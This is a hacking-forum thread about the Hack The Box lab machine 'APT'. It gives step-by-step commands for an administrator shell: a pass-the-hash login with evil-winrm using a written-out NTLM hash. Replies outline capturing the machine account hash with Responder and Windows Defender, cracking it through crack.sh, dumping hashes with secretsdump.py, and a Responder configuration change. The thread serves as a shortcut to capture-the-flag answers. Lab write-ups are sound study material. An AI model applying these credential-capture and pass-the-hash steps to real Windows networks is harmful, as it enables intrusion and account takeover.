FLAG APT Commands to root ( get both user and root flags )
by vegetakasapa - January 16, 2021 at 11:00 AM
#1
1) add "dead:beef::b885:d62a:d679:573f apt.htb" to /etc/hosts
2) run "sudo gem install evil-winrm" 
3) finally execute "evil-winrm -i apt.htb -u administrator -H c370bddf384a691d811ff3495e8a72e2"


bhoom u will get the admin shell :) 

if u feel helpful please donate Hidden Content
You must register or login to view this content.
Reply
#2
(January 16, 2021 at 11:00 AM)vegetakasapa Wrote: 1) add "dead:beef::b885:d62a:d679:573f apt.htb" to /etc/hosts
2) run "sudo gem install evil-winrm" 
3) finally execute "evil-winrm -i apt.htb -u administrator -H c370bddf384a691d811ff3495e8a72e2"


bhoom u will get the admin shell :) 

[Hidden Content]

How did you get the administrator hash
Reply
#3
It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.
Reply
#4
Thanks! Would donate, but don't have enough to do :(

Btw how did you get defender to try to authenticate to your machine? running MpCmdRun.exe was denied.
Reply
#5
Got the command working and see the smb traffic on my box, but for some reason responder isn't giving me any hashes and can't seem to figure out what is wrong
Reply
#6
(January 18, 2021 at 04:43 PM)jarvis4321 Wrote: Got the command working and see the smb traffic on my box, but for some reason responder isn't giving me any hashes and can't seem to figure out what is wrong
Just in case someone is wondering, for some reason scantype needs to be set correctly for the hash to be sent as well as the setting in responder
Reply
#7
(January 18, 2021 at 02:25 PM)lingling40hrs Wrote: It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

Is there a way that you can crack the hash without having to pay for it at crack.sh?
Reply
#8
(January 21, 2021 at 09:47 AM)parapride Wrote:
(January 18, 2021 at 02:25 PM)lingling40hrs Wrote: It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

Is there a way that you can crack the hash without having to pay for it at crack.sh?

Hi there! I was afraid of the same thing, but crack.sh will crack the NTLMv1 for free...you just need to enter it in per their instructions, enter your email, and it will be sent to you. For me, I received their completed email in around 5-10 minutes after submission.
Reply
#9
Hidden Content
You must register or login to view this content.
Reply
#10
(January 21, 2021 at 09:47 AM)parapride Wrote:
(January 18, 2021 at 02:25 PM)lingling40hrs Wrote: It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

Is there a way that you can crack the hash without having to pay for it at crack.sh?

You need to set your "Challenge" in responder to the magic value for it to be free.

### Setup
So, you may or may not have already done this. In your responder conf, for the cracks to be "free", you need to set your challenge id to the magic value. This is in `/etc/responder/Responder.conf`.

Set it as:
```
; Custom challenge
Challenge = 1122334455667788

```
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
FLAG || APT - Detailed Writeup || burjukakabubu 42 6,834 February 23, 2021 at 12:59 PM
Last Post: raid1718
SELLING Tenet user and root flag tetestcomp126 1 197 February 19, 2021 at 08:22 PM
Last Post: John Doe
FLAG HTB Synack Track 7 Challenges Flags and writeups y0ukn0wm3 23 3,402 February 18, 2021 at 04:39 AM
Last Post: tetestcomp126

 Users browsing this thread: 1 Guest(s)